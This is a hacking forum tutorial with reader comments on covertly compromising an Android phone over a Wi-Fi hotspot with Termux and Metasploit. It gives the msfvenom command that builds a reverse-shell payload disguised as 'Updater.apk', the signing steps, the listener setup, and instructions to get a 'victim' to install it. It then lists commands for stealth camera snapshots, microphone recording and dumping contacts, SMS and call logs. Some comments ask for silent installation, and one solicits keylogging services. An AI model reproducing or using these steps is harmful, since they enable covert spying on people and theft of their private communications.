How to: HACK Android Device with TermuX on Android | Part #2 - Over WLAN Hotspot [Ultimate Guide]

Hi My Fellow H4ck3Rs

  • Wanna do some WATCH_DOGS style H4cK1nG...!!! (Over your WLAN Hotspot), then you are at right place! , but this time, we are not HACKING over the World Wide Internet. But we are going to do HACKING over WLAN Network.
  • You can say it as: "Android to Android Hacking". This method works 100%, so follow my tutorial carefully, it is really very easy to follow. If you got any errors or you think I`ve missed something, then inform me in Comments section. I`ll try best to solve the problem.
  • One Restriction: Metasploit Does not work over Long ranges (Only for WLAN Hotspot), For-Example, if the distance of your victim`s Android Device (whose wifi is connected to your WLAN Hotspot) is more than 10m from yours , then you will not be able to HACK that Device! To avoid this situation, use my Part #1 Tutorial, because it is very reliable.
  • DISCLAIMER: This Thread is O.N.L.Y for Education Purposes. I will not be Responsible of Any Negative and Illegal use of this information. Try not to HACK the Androids, other than your`s. Or you will be in PRISON. Only Use this information for testing purposes or impressing your friends.

So, lets get started...


1). Android 5.0 (Or later)

2). TermuX Android App (Download it from Play Store

3). Installed Metasploit Framework in TermuX (My Tutorial Here)

4). Active WLAN Hotspot

5). TermuX should be allowed to use External Storage (For this only enter this command at once: "termux-setup-storage")

6). MiXplorer (For signing APK file, Download it from UpToDown Website)

7). MiX Signer (APK Signer for MiXplorer, Download it from Play Store)

8). (Recommended) Use Hacker`s Keyboard for entering commands in TermuX easily.

Step 1: Which IP Should Be Used...!?

  • First of all, turn on your WiFi Hotspot (WLAN Hotspot).
  • Connect you Victim`s Android Device to it.
  • Now, you have to open TermuX and note down your IP (as a Server). For this, open TermuX, and Enter:


  • Now, here you can see your Permanent Hotspot IP address (as a Server), under ap0 field, Like this (Here my Permanent IP as a Server is
  • Note Down your Permanent Hotspot IP address, for later use.

Step 2: Creating APK File with Embedded Payload

  • To create APK File with Embedded Payload, enter this command in TermuX:

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R
> storage/downloads/Updater.apk

  • Wait for a minute...
  • Alright... Now the APK file with Embedded payload is successfully generated here: Phone/SD-Card Storage -> downloads -> Updater.apk
  • (OPTIONAL) You can use APK Editor Pro , to change the name (Default: MainActivity), and Version of the generated APK file.

Step 3: Signing Newly Generated APK File

To sign the newly generated APK File,

  • Open MiXplorer File Manager and head to "Un-Signed APK File (Updater.apk)" (will be located in downloads folder).
  • Long Press on "Un-Signed APK File (Updater.apk)" and select "MENU button" on top right corner of MiXplorer, then select "SIGN".
  • It will display variety of options to sign APK File (but "AUTO" is preferred).
  • Select "AUTO" to Automatically & Successfully sign the APK file.
  • Now, your APK file: (filename)-signed.apk is successfully signed and fully functional also is of 9.9KB of size.

Step 4: Setup Metasploit in TermuX

  • Activate Metasploit Framework in TermuX by entering this command in new session:


Note(1):- If you have not installed Metasploit-Framework in your TermuX app yet, then follow This Tutorial: Install Metasploit Framework in TermuX on Android | H4ck3R_777

Note(2):- If you are getting this error: Failed to connect to the database , as shown in the above screenshot, enter the following commands in NEW SESSION (Unfortunately You may have to enter these commands every time you open TermuX (in a separate session). But fortunately entering no such (following) commands, will not affect your Hacking! That`s why, I`m ignoring this error) :

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

— Thanks to DUST WORLD, for this fix ...!!!
  • Wait for a min...
  • Now, When the msfconsole starts, type the following (Bolded) commands one by one carefully:

msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST
msf> set LPORT 4444
msf> exploit -j -z

— Enter only BOLDED commands

Step 5: Installing APK in Victim's Android Device

  • Now, Send the Updater-Signed.apk file into your victim`s android device (e.g. via Bluetooth is Recommended) -> Install it -> then open it (Make sure that the Victim`s device has a successful WiFi connection with your WLAN Hotspot).
  • After opening APK file in victim`s phone, you will see that Meterpreter Session in your Metasploit field will be activated.
  • To open the Meterpreter session of your victim`s device, click "Return Button" (if required) and enter this Command in Metasploit session:

sessions -i (Session ID)

— (Session ID) = 1 , 2 , 3 , 4 or 5 ...
  • In (Session ID) , select the session number of Meterpreter (i.e. You will see this message when your victim opens the APK file: Meterpreter Session Opened 1 , here , 1 is the session id of Meterpreter Session). Watch the screenshot below.
  • If you see the following window, then
  • BINGO.......!!!!!!!! You have successfully hacked your Victim`s Android Device

!!!...Need Some Help While Hacking...???

You can enter: {meterpreter> help} command, for all the available commands, here, I`ve simplified some commands for the use of TermuX.

  • Taking Stealth Snapshot from Front Camera

Just enter this command for this:

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

Here, in this command, 2 is representing the front camera. For Back camera, we will use 1.

Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-F.jpg

  • Taking Stealth Snapshot from Rear Camera

Just as the above, but this time, we will use 1,

webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg

Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-R.jpg

  • Fetching All Contacts

To fetch contacts, just enter this command:

dump_contacts -o storage/downloads/X-Contacts.txt

Conacts will be saved in : (Default Write Storage) -> downloads -> X-Contacts.txt

  • Fetching All SMS

Just like above,

dump_sms -o storage/downloads/X-SMS.txt

All the SMS will be saved in : (Default Write Storage) -> downloads -> X-SMS.txt

  • Fetching Call Log

Just enter this:

dump_calllog -o storage/downloads/X-CallLog.txt

Call Log will be saved in : (Default Write Storage) -> downloads -> X-CallLog.txt

  • Spying Through Microphone

Here, you have to edit the duration of the recording microphone (default: 1s). Command for 10 seconds recording is this:

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3

Spy Recording will be saved in : (Default Write Storage) -> downloads -> X-Spy-Record.mp3

  • Exiting Meterpreter Session

Just enter exit to close current Meterpreter Session. Enter again to exit Metasploit.

???...Common Problems...???

  • Metasploit not running on TermuX

This might happen, if you do anything wrong in installing TermuX on android. If you see error like GEMS not found, or any this kind of error, simply Delete TermuX with its data, and reinstall it.

  • msfvenom/msfconsole : command not found!

There are two possible reasons for that error.

1). Metasploit is not properly installed on TermuX. That`s why, it was unable to create Command Shortcut. To fix this, uninstall the TermuX, with Data. Then reinstall TermuX and repeat all the Method again. This is actually a script error. I also faced this problem on first time installing Metasploit in TermuX!

2). Metasploit is successfully installed, but was unable to create the shortcut. To manage this, just enter:

cd metasploit-framework

then, enter msfvenom command with ./ at start. i.e

./msfvenom -p ......

  • Why we are using MiXplorer for Signing the APK File ...?

Actually, there is no other way to sign theAPK file on Android. Otherwise, You have to sign the APP file in Your PC (Specially in Kali LinuX). MiXplorer is the Excellent way to sign the APK file, directly in Android.

  • Metasploit Error: Failed to connect to the Database

Don`t worry about it. We have already made a solution for this :) . I think you have noticed earlier , that I was using "localhost" , instead of or :::0:1 , as HOST. Actually, the "localhost" command automatically connects you to the available Local Host, no matter if it is or :::0.1 etc.

But if you still want to fix it, enter the following commands in New Session of TermuX carefully:

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

— Thanks to DUSTY WORLD , for this FIX ...!!!
  • Which Android Phone is best for H4ck1nG Purposes ...?

1). Google NexuS phones/Tablets are Excellent for Hack1nG Purposes. As, they completely supports Kali NetHunter. NetHunter includes all the tools for hacking, and it works as an Android/Windows on a Tablet.

2). But if we talk about Android, Many H4ck3Rs say that Samsung Galaxy S5 is Excellent for Ha4ck1nG Purposes. It has a good Android Version, also completely supports the TermuX.


This information is for Educational Purposes Only. I`ll not be responsible of any Negative or Illegal use of this information. Also if you face any type of errors, or you think that I`ve missed something, then tell me in Comments Section. I`ll find the Suitable Solution for that. Anyways, Just use these tricks for FUN... Not for doing Illegal work. We are all Ethical H4ck3Rs, and never invade people Privacies.

Anyway, Thanks for reading my Thread (You can also join our WhatsApp Group for more information and Guides). BEST OF LUCK ...!!!

  • H4ck3R_777

26 Responses

If You Liked My Guide, Then Don't Forget to Give Feedback and Vote This Comment. Enjoy ...!!!

I keep getting this error. Could not find activesupport-4.2.11 in any of the sources Run `bundle install` to install missing gems. Any way to fix this? Thanks.

Type pkg install metasploit and hit enter

In my case , it is showing this. Can you please tell me which is ip address
$ ifconfig
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet netmask
inet6 ::1 prefixlen 128 scopeid 0x10<host>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1 (UNSPEC)
RX packets 60521 bytes 60890352 (58.0 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 60521 bytes 60890352 (58.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

inet netmask destination
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 1152513 bytes 1156679712 (1.0 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 930342 bytes 114032354 (108.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

swlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet netmask broadcast
inet6 fe80::1819:d6ff:fe3f:1857 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 104128 bytes 28614165 (27.2 MiB)
RX errors 0 dropped 1 overruns 0 frame 0
TX packets 79985 bytes 71255802 (67.9 MiB)
TX errors 0 dropped 268 overruns 0 carrier 0 collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 948542 bytes 1012812986 (965.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 794006 bytes 265528907 (253.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


Yo swlan0 is Ur ip or wlan1 (appears only when your wlan or mobile hotspot is active or on) mostly it starts with 192....

Meterpreter<> yeaha tak aya but age ke jo comands hai for contac or sms ke liye wo comand not found bata raha hai

Brother this is an awesome tutorial really awesome!!!! But I've got just one question that, can we directly use the payload using msfconsole instead of embedding it with the msfvenom????

  • Good Idea Dusty, I`ll look into it ...!

Yeah just one thing, in the screenshot mentioned above, you do not seemed to be connected the postgresql database, here try this.

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start
use these commands to do that.

O Thanks Dude ...!!!

  • It worked ...!!!
  • I`ve Updated the Tutorial.

Neeed a good hacker that know how get into other computer spamming key logg anything just holla $$

I'am not able start the msfconsole from any directory in termux. In order to start msfconsole I need to go to metasploit-framework directory and then start metasploit using ./ msfconsole command I think this is the reason why i'm not able to store the call logs in phones(external storage) directory please help me how msfconsole command works in any directory rather than starting it by going to metasploit-framework folder

  • No Bro, it is not the problem. Just follow me:
  • Use this command:


— Only for once
  • Now, you can store your files to Default Write Storage, via a Symlinked Folder: storage , located in TermuX Default directory. Now, Use commands that I listed in !!!...Need Some Help While Hacking...??? Tab, (Or you can take an Idea from those above listed commands).

I followed all of your and ended there
I will try again by uninstalling and re-installing them

  • What is your Android Version ...? Plz tell me before re-installing it. Anyway, You can use Total Commander File Manager to extract files from com.termux (root) folder. I`m not sure that root is required for this or not. If it does`nt work. Try cp command of TermuX to copy files from the com.termux directory to your Internal/External Storage. This might help you out.

The problem was symlinking now it worked fine

  • Great! , Good Luck ...!!!

What is the command to record video from vicum device ??

I can't install nokogiri. Help me please.

Suggestions for a sneaky third-party mobile hotspot app?I'm on Verizon Wireless in the U.S. and I recently upgraded to unlimited data. On the whole, it's been great since I was already paying more for 30GB/month. However, as with everything like this, Verizon wasn't being completely honest when they told me the data was unlimited. If I turn on the mobile hotspot and use my phone's 4G network through other devices, I have a limit of 10GB. I frequently work on the train or just use my hotspot if it's faster than available wifi.

So, does anyone know of a third-party mobile hotspot app that will look to Verizon as if the data is being used by my phone and not by any connected device? Thanks a lot.

Dude help I can't generate an apk file

Is there a way to force install .apk silently thru wlan? Sort of like the auto-installing hidden/silent programs with a usb on Windows machines...Or do you have to actually have physical access?

Now, Send the Updater-Signed.apk file into your victim`s android device (e.g. via Bluetooth is Recommended) -> Install it -> then open it (Make sure that the Victim`s device has a successful WiFi connection with your WLAN Hotspot).

It this step we need physical access of victim's device or not ???

What do I do when I cant find open ports with nmap scan

Share Your Thoughts

  • Hot
  • Active